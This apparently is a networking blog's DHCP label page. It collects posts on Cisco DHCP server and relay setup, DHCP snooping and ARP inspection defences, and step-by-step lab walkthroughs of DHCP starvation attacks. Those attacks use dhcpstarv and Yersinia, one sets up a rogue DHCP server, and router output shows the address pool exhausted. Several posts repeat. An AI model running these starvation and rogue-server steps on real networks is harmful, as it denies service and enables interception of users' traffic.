Switch(config)#ip dhcp relay address 10.1.1.100
Switch(config)#ip dhcp relay enable
Switch(config)#interface vlan 10
Switch(config-if)#ip dhcp relay enable
Switch(config-if)#end
Showing posts with label dhcp. Show all posts
Showing posts with label dhcp. Show all posts
19 September, 2014
30 July, 2014
DHCP Snooping
# Attack Scenario
DHCP Snooping
- Enable on Switch
- Enable on VLAN
- ID Trusted Ports
SW2#conf terminal
! Enable the feature
SW2(config)#ip dhcp snooping
! Set directory to save database
SW2(config)#ip dhcp snooping database flash:/snoopy.db
! Enable the feature for VLAN
SW2(config)#ip dhcp snooping vlan 123
! Configure Trust port (DHCP Server)
SW2(config)#interface fas 0/3
SW2(config-if)#description trunk leading to real DHCP server
SW2(config-if)#ip dhcp snooping trust
* Note: accepts OFFERS and ACKs
! Configure user ports
SW2(config)#interface fas 0/1
SW2(config-if)#description user port
SW2(config-if)#ip dhcp snooping limit rate 10
* Note: 10 pps (Packet per second)
SW2(config-if)#switchport port-security
SW2(config-if)#switchport port-security maximum 5
SW2#show ip dhcp snooping
Switch DHCP snooping is enabled
DHCP snooping is configured on following VLANs:
123
DHCP snooping is operational on following VLANs:
123
DHCP snooping is configured on the following L3 Interfaces:
Insertion of option 82 is enabled
circuit-id format: vlan-mod-port
remote-id format: MAC
Option 82 on untrusted port is not allowed
Verification of hwaddr field is enabled
Verification of giaddr field is enabled
DHCP snooping trust/rate is configured on the following Interfaces:
Interface Trusted Rate limit (pps)
------------------------ ------- ----------------
FastEthernet0/1 no 10
FastEthernet0/3 yes unlimited
SW2#show ip dhcp snooping binding
MacAddress IpAddress Lease(sec) Type VLAN Interface
------------------ --------------- ---------- ------------- ---- --------------------
00:0C:29:16:57:AC 10.123.0.3 85971 dhcp-snooping 123 FasEthernet0/2
Total number of bindings: 1
DHCP Snooping
- Enable on Switch
- Enable on VLAN
- ID Trusted Ports
SW2#conf terminal
! Enable the feature
SW2(config)#ip dhcp snooping
! Set directory to save database
SW2(config)#ip dhcp snooping database flash:/snoopy.db
! Enable the feature for VLAN
SW2(config)#ip dhcp snooping vlan 123
! Configure Trust port (DHCP Server)
SW2(config)#interface fas 0/3
SW2(config-if)#description trunk leading to real DHCP server
SW2(config-if)#ip dhcp snooping trust
* Note: accepts OFFERS and ACKs
* Note: If we use IOS DHCP server, we have to execute next command
Router(config)# ip dhcp relay information trust
! Configure user ports
SW2(config)#interface fas 0/1
SW2(config-if)#description user port
SW2(config-if)#ip dhcp snooping limit rate 10
* Note: 10 pps (Packet per second)
SW2(config-if)#switchport port-security
SW2(config-if)#switchport port-security maximum 5
SW2#show ip dhcp snooping
Switch DHCP snooping is enabled
DHCP snooping is configured on following VLANs:
123
DHCP snooping is operational on following VLANs:
123
DHCP snooping is configured on the following L3 Interfaces:
Insertion of option 82 is enabled
circuit-id format: vlan-mod-port
remote-id format: MAC
Option 82 on untrusted port is not allowed
Verification of hwaddr field is enabled
Verification of giaddr field is enabled
DHCP snooping trust/rate is configured on the following Interfaces:
Interface Trusted Rate limit (pps)
------------------------ ------- ----------------
FastEthernet0/1 no 10
FastEthernet0/3 yes unlimited
SW2#show ip dhcp snooping binding
MacAddress IpAddress Lease(sec) Type VLAN Interface
------------------ --------------- ---------- ------------- ---- --------------------
00:0C:29:16:57:AC 10.123.0.3 85971 dhcp-snooping 123 FasEthernet0/2
Total number of bindings: 1
16 November, 2013
DHCP Snooping
Configure DHCP Snooping For VLAN 101: (Global Configuration) configure terminal no ip dhcp snooping information option ip dhcp snooping ip dhcp snooping vlan 101 Configure Trunk Ports: interface range fastEthernet 0/7-8 (Trunk Ports Connected To DHCP. DHCP Offers Are Permited) ip dhcp snooping trust Configure Access Port Limits: (User Port) interface fastEthernet 0/1 ip dhcp snooping limit rate 5 (5 DHCP Offers) Configure Errdisable: errdisable detect cause dhcp-rate-limit errdisable recovery cause dhcp-rate-limit errdisable recovery interval 30
Configure Dynamic ARP Inspection DAI: (Global Configuration)
configure terminal
ip arp inspection vlan 101
ip arp inspection log-buffer entries 1024
ip arp inspection log-buffer logs 1024 interval 10
commands to verify the configuration:
show ip dhcp snooping
debug ip dhcp snooping event
show log
show errdisable
DHCP Snooping is a security feature capable of intercepting DHCP messages crossing a switch and blocking bogus DHCP offers. DHCP Snooping uses the concept of trusted and untrusted ports. Typically, the trusted ports are used to reach DHCP servers or relay agents, while untrusted ports are used to connect to clients
Dynamic ARP Inspection (DAI) is a security feature that helps prevent ARP poisoning and other ARP-based attacks by intercepting all ARP requests and responses, and by verifying their authenticity before updating the switch's local ARP cache or forwarding the packets to the intended destinations.
Attacks:
• STP MiTM (Vlan) Attack: Yersinia, Ettercap• STP MiTM (ISL) Attack: Yersinia, Ettercap, packETH• ARP MiTM Attack: Ettercap• MAC Overflow Attack: Ettercap• DHCP Consumption Atack: Yersinia• DHCP Starvation Attack: dhcpstarv
25 October, 2013
DHCP Starvation and Rogue DHCP Server
Download and Instal dhcpstarv <.>
root@bt:~# tar xvfz dhcpstarv-0.2.1.tar.gz
root@bt:~# cd dhcpstarv-0.2.1
root@bt:dhcpstarv-0.2.1# ./configure
root@bt:dhcpstarv-0.2.1# make
root@bt:dhcpstarv-0.2.1# make install
Start Attack
root@bt:# dhcpstarv [-i Interface] [-e Exclude]
Ejample:
root@bt:~# dhcpstarv -v -i eth2 -e 10.0.10.2
Download DHCP Server
root@bt:~# apt-get install dhcp3-server -y
Make Backup File
root@bt:~# cp /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.config.backup
Set your DHCP Pool Information
root@bt:~# vi /etc/dhcp3/dhcpd.conf
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option domain-name "microsoft.com";
option broadcast-address 192.168.2.255;
option routers 192.168.2.1;
option domain-name-servers 8.8.8.8;
range 192.168.2.51 192.168.2.100;
}
Tell DHCP wich configuration to use
root@bt:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid eth0
Start DHCP Server
root@bt:~# /etc/init.d/dhcp3-server start
root@bt:~# tar xvfz dhcpstarv-0.2.1.tar.gz
root@bt:~# cd dhcpstarv-0.2.1
root@bt:dhcpstarv-0.2.1# ./configure
root@bt:dhcpstarv-0.2.1# make
root@bt:dhcpstarv-0.2.1# make install
Start Attack
root@bt:# dhcpstarv [-i Interface] [-e Exclude]
Ejample:
root@bt:~# dhcpstarv -v -i eth2 -e 10.0.10.2
Download DHCP Server
root@bt:~# apt-get install dhcp3-server -y
Make Backup File
root@bt:~# cp /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.config.backup
Set your DHCP Pool Information
root@bt:~# vi /etc/dhcp3/dhcpd.conf
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option domain-name "microsoft.com";
option broadcast-address 192.168.2.255;
option routers 192.168.2.1;
option domain-name-servers 8.8.8.8;
range 192.168.2.51 192.168.2.100;
}
Tell DHCP wich configuration to use
root@bt:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid eth0
Start DHCP Server
root@bt:~# /etc/init.d/dhcp3-server start
10 June, 2013
DHCP Starvation Attack Using Yersinia
DHCP Starvation Attack
Configure Cisco Router as DHCP
R1(config)#ip dhcp excluded-address 192.168.1.1 192.168.1.10
R1(config)#ip dhcp pool MYPOOL
R1(dhcp-config)#default-router 192.168.1.1
R1(dhcp-config)#dns-server 192.168.1.1
R1(dhcp-config)#domain-name microsoft.com
R1(dhcp-config)#network 192.168.1.0 /24
R1(dhcp-config)#exit
Configure Interface
R1(config)#interface fastEthernet 0/0
R1(config-if)#ip address 192.168.1.1 255.255.255.0
R1(config-if)#no shutdown
Verify Configuration
R1#show ip dhcp binding
Bindings from all pools not associated with VRF:
IP address Client-ID/ Lease expiration Type
Hardware address/
User name
192.168.1.11 0108.0027.5351.11 Mar 02 2002 12:04 AM Automatic
192.168.1.12 0102.004c.4f4f.50 Mar 02 2002 12:08 AM Automatic
R1#show ip dhcp pool
Pool MYPOOL :
Utilization mark (high/low) : 100 / 0
Subnet size (first/next) : 0 / 0
Total addresses : 254
Leased addresses : 2
Pending event : none
1 subnet is currently in the pool :
Current index IP address range Leased addresses
192.168.1.12 192.168.1.1 - 192.168.1.254 1
R1#show ip dhcp server statistics
Memory usage 24329
Address pools 1
Database agents 0
Automatic bindings 2
Manual bindings 0
Expired bindings 0
Malformed messages 0
Secure arp entries 0
Message Received
BOOTREQUEST 0
DHCPDISCOVER 2
DHCPREQUEST 2
DHCPDECLINE 0
DHCPRELEASE 0
DHCPINFORM 2
Message Sent
BOOTREPLY 0
DHCPOFFER 2
DHCPACK 4
DHCPNAK 0
We Have only 2 DHCP Client.
Now Get Start The DHCP Discovery Attack Using Yersinia 0.7.1 .
Verify Interface Configuration
root@bt:~# ifconfig eth0
eth0 Link encap:Ethernet HWaddr 08:00:27:9d:cb:38
inet addr:192.168.1.2 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe9d:cb38/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1011 errors:0 dropped:0 overruns:0 frame:0
TX packets:2638752 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:153749 (153.7 KB) TX bytes:753163338 (753.1 MB)
Interrupt:10 Base address:0xd020
root@bt:~# yersinia -G
Opens Graphical Interface
Click "Lunch attack"
Select "DHCP" And Than "Send DISCOVERY Packet"
Now Cheack Router
Monitor and Verify Cisco Router
R1#debug ip dhcp server packet
*Mar 1 00:30:44.043: DHCPD: Sending DHCPOFFER to client b870.fe70.9c15 (192.168.1.64).
*Mar 1 00:30:44.047: DHCPD: broadcasting BOOTREPLY to client b870.fe70.9c15.
*Mar 1 00:30:44.087: DHCPD: DHCPDISCOVER received from client 33d7.f461.f513 on interface FastEthernet0/0.
*Mar 1 00:30:44.095: DHCPD: Allocate an address without class information (192.168.1.0)
R1#un all
R1#show ip dhcp pool
Pool MYPOOL :
Utilization mark (high/low) : 100 / 0
Subnet size (first/next) : 0 / 0
Total addresses : 254
Leased addresses : 244
Pending event : none
1 subnet is currently in the pool :
Current index IP address range Leased addresses
0.0.0.0 192.168.1.1 - 192.168.1.254 244
R1#show ip dhcp server statistics
Memory usage 55845
Address pools 1
Database agents 0
Automatic bindings 132
Manual bindings 0
Expired bindings 124
Malformed messages 0
Secure arp entries 0
Message Received
BOOTREQUEST 0
DHCPDISCOVER 5424
DHCPREQUEST 2
DHCPDECLINE 0
DHCPRELEASE 0
DHCPINFORM 2
Message Sent
BOOTREPLY 0
DHCPOFFER 256
DHCPACK 4
DHCPNAK 0
R1#show ip dhcp binding
Bindings from all pools not associated with VRF:
IP address Client-ID/ Lease expiration Type
Hardware address/
User name
192.168.1.11 0108.0027.5351.11 Mar 02 2002 12:04 AM Automatic
192.168.1.12 0102.004c.4f4f.50 Mar 02 2002 12:08 AM Automatic
192.168.1.39 6909.b30f.bfae Mar 01 2002 12:43 AM Automatic
<Lines Omitted>
192.168.1.253 5084.9a4f.901e Mar 01 2002 12:42 AM Automatic
192.168.1.254 6440.0969.6d16 Mar 01 2002 12:42 AM Automatic
All Pool Addresses are used.
Done !
##########################################################################################################
Configure Cisco Router as DHCP
R1(config)#ip dhcp excluded-address 192.168.1.1 192.168.1.10
R1(config)#ip dhcp pool MYPOOL
R1(dhcp-config)#default-router 192.168.1.1
R1(dhcp-config)#dns-server 192.168.1.1
R1(dhcp-config)#domain-name microsoft.com
R1(dhcp-config)#network 192.168.1.0 /24
R1(dhcp-config)#exit
Configure Interface
R1(config)#interface fastEthernet 0/0
R1(config-if)#ip address 192.168.1.1 255.255.255.0
R1(config-if)#no shutdown
Verify Configuration
R1#show ip dhcp binding
Bindings from all pools not associated with VRF:
IP address Client-ID/ Lease expiration Type
Hardware address/
User name
192.168.1.11 0108.0027.5351.11 Mar 02 2002 12:04 AM Automatic
192.168.1.12 0102.004c.4f4f.50 Mar 02 2002 12:08 AM Automatic
R1#show ip dhcp pool
Pool MYPOOL :
Utilization mark (high/low) : 100 / 0
Subnet size (first/next) : 0 / 0
Total addresses : 254
Leased addresses : 2
Pending event : none
1 subnet is currently in the pool :
Current index IP address range Leased addresses
192.168.1.12 192.168.1.1 - 192.168.1.254 1
R1#show ip dhcp server statistics
Memory usage 24329
Address pools 1
Database agents 0
Automatic bindings 2
Manual bindings 0
Expired bindings 0
Malformed messages 0
Secure arp entries 0
Message Received
BOOTREQUEST 0
DHCPDISCOVER 2
DHCPREQUEST 2
DHCPDECLINE 0
DHCPRELEASE 0
DHCPINFORM 2
Message Sent
BOOTREPLY 0
DHCPOFFER 2
DHCPACK 4
DHCPNAK 0
We Have only 2 DHCP Client.
Now Get Start The DHCP Discovery Attack Using Yersinia 0.7.1 .
Verify Interface Configuration
root@bt:~# ifconfig eth0
eth0 Link encap:Ethernet HWaddr 08:00:27:9d:cb:38
inet addr:192.168.1.2 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe9d:cb38/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1011 errors:0 dropped:0 overruns:0 frame:0
TX packets:2638752 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:153749 (153.7 KB) TX bytes:753163338 (753.1 MB)
Interrupt:10 Base address:0xd020
root@bt:~# yersinia -G
Opens Graphical Interface
Click "Lunch attack"
Select "DHCP" And Than "Send DISCOVERY Packet"
Now Cheack Router
Monitor and Verify Cisco Router
R1#debug ip dhcp server packet
*Mar 1 00:30:44.043: DHCPD: Sending DHCPOFFER to client b870.fe70.9c15 (192.168.1.64).
*Mar 1 00:30:44.047: DHCPD: broadcasting BOOTREPLY to client b870.fe70.9c15.
*Mar 1 00:30:44.087: DHCPD: DHCPDISCOVER received from client 33d7.f461.f513 on interface FastEthernet0/0.
*Mar 1 00:30:44.095: DHCPD: Allocate an address without class information (192.168.1.0)
R1#un all
R1#show ip dhcp pool
Pool MYPOOL :
Utilization mark (high/low) : 100 / 0
Subnet size (first/next) : 0 / 0
Total addresses : 254
Leased addresses : 244
Pending event : none
1 subnet is currently in the pool :
Current index IP address range Leased addresses
0.0.0.0 192.168.1.1 - 192.168.1.254 244
R1#show ip dhcp server statistics
Memory usage 55845
Address pools 1
Database agents 0
Automatic bindings 132
Manual bindings 0
Expired bindings 124
Malformed messages 0
Secure arp entries 0
Message Received
BOOTREQUEST 0
DHCPDISCOVER 5424
DHCPREQUEST 2
DHCPDECLINE 0
DHCPRELEASE 0
DHCPINFORM 2
Message Sent
BOOTREPLY 0
DHCPOFFER 256
DHCPACK 4
DHCPNAK 0
R1#show ip dhcp binding
Bindings from all pools not associated with VRF:
IP address Client-ID/ Lease expiration Type
Hardware address/
User name
192.168.1.11 0108.0027.5351.11 Mar 02 2002 12:04 AM Automatic
192.168.1.12 0102.004c.4f4f.50 Mar 02 2002 12:08 AM Automatic
192.168.1.39 6909.b30f.bfae Mar 01 2002 12:43 AM Automatic
<Lines Omitted>
192.168.1.253 5084.9a4f.901e Mar 01 2002 12:42 AM Automatic
192.168.1.254 6440.0969.6d16 Mar 01 2002 12:42 AM Automatic
All Pool Addresses are used.
Done !
##########################################################################################################
24 April, 2013
Configure DHCP On Cisco Router
Configure
configure terminal
ip dhcp excluded-address 10.1.64.1 10.1.64.9
ip dhcp excluded-address 10.1.64.201 10.1.64.255
ip dhcp pool VLAN05
default-router 10.1.64.1
dns-server 8.8.8.8 4.2.2.3
domain-name microsoft.com
option 150 ip 10.1.68.8
network 10.1.64.0 255.255.255.0
lease infinite
utilization mark high 80 log
utilization mark low 70 log
end
Note :
** Configures the high utilization mark of the current address pool size.
The log keyword enables the logging of a system message. A system message will be
generated for a DHCP pool when the pool utilization exceeds the conigured high utilization threshold.
** lease {days [hours][minutes] | infinite}
** option [Number]
Iana List: http://www.iana.org/assignments/bootp-dhcp-parameters/bootp-dhcp-parameters.txt
Verify: Show Commands
#show ip dhcp pool POOL-NAME
(Displays information about DHCP address pools)
#show ip dhcp binding
(Use this command to display the IP addresses that have already been assigned)
#show ip dhcp conflict
(Displays a list of all address conflicts)
#show ip dhcp database
(Displays recent activity on the DHCP database)
#show ip dhcp server statistics
(Displays count information about server statistics and messages sent and received)
#debug ip dhcp server packet
configure terminal
ip dhcp excluded-address 10.1.64.1 10.1.64.9
ip dhcp excluded-address 10.1.64.201 10.1.64.255
ip dhcp pool VLAN05
default-router 10.1.64.1
dns-server 8.8.8.8 4.2.2.3
domain-name microsoft.com
option 150 ip 10.1.68.8
network 10.1.64.0 255.255.255.0
lease infinite
utilization mark high 80 log
utilization mark low 70 log
end
Note :
** Configures the high utilization mark of the current address pool size.
The log keyword enables the logging of a system message. A system message will be
generated for a DHCP pool when the pool utilization exceeds the conigured high utilization threshold.
** lease {days [hours][minutes] | infinite}
** option [Number]
Iana List: http://www.iana.org/assignments/bootp-dhcp-parameters/bootp-dhcp-parameters.txt
Verify: Show Commands
#show ip dhcp pool POOL-NAME
(Displays information about DHCP address pools)
#show ip dhcp binding
(Use this command to display the IP addresses that have already been assigned)
#show ip dhcp conflict
(Displays a list of all address conflicts)
#show ip dhcp database
(Displays recent activity on the DHCP database)
#show ip dhcp server statistics
(Displays count information about server statistics and messages sent and received)
#debug ip dhcp server packet
Subscribe to:
Posts (Atom)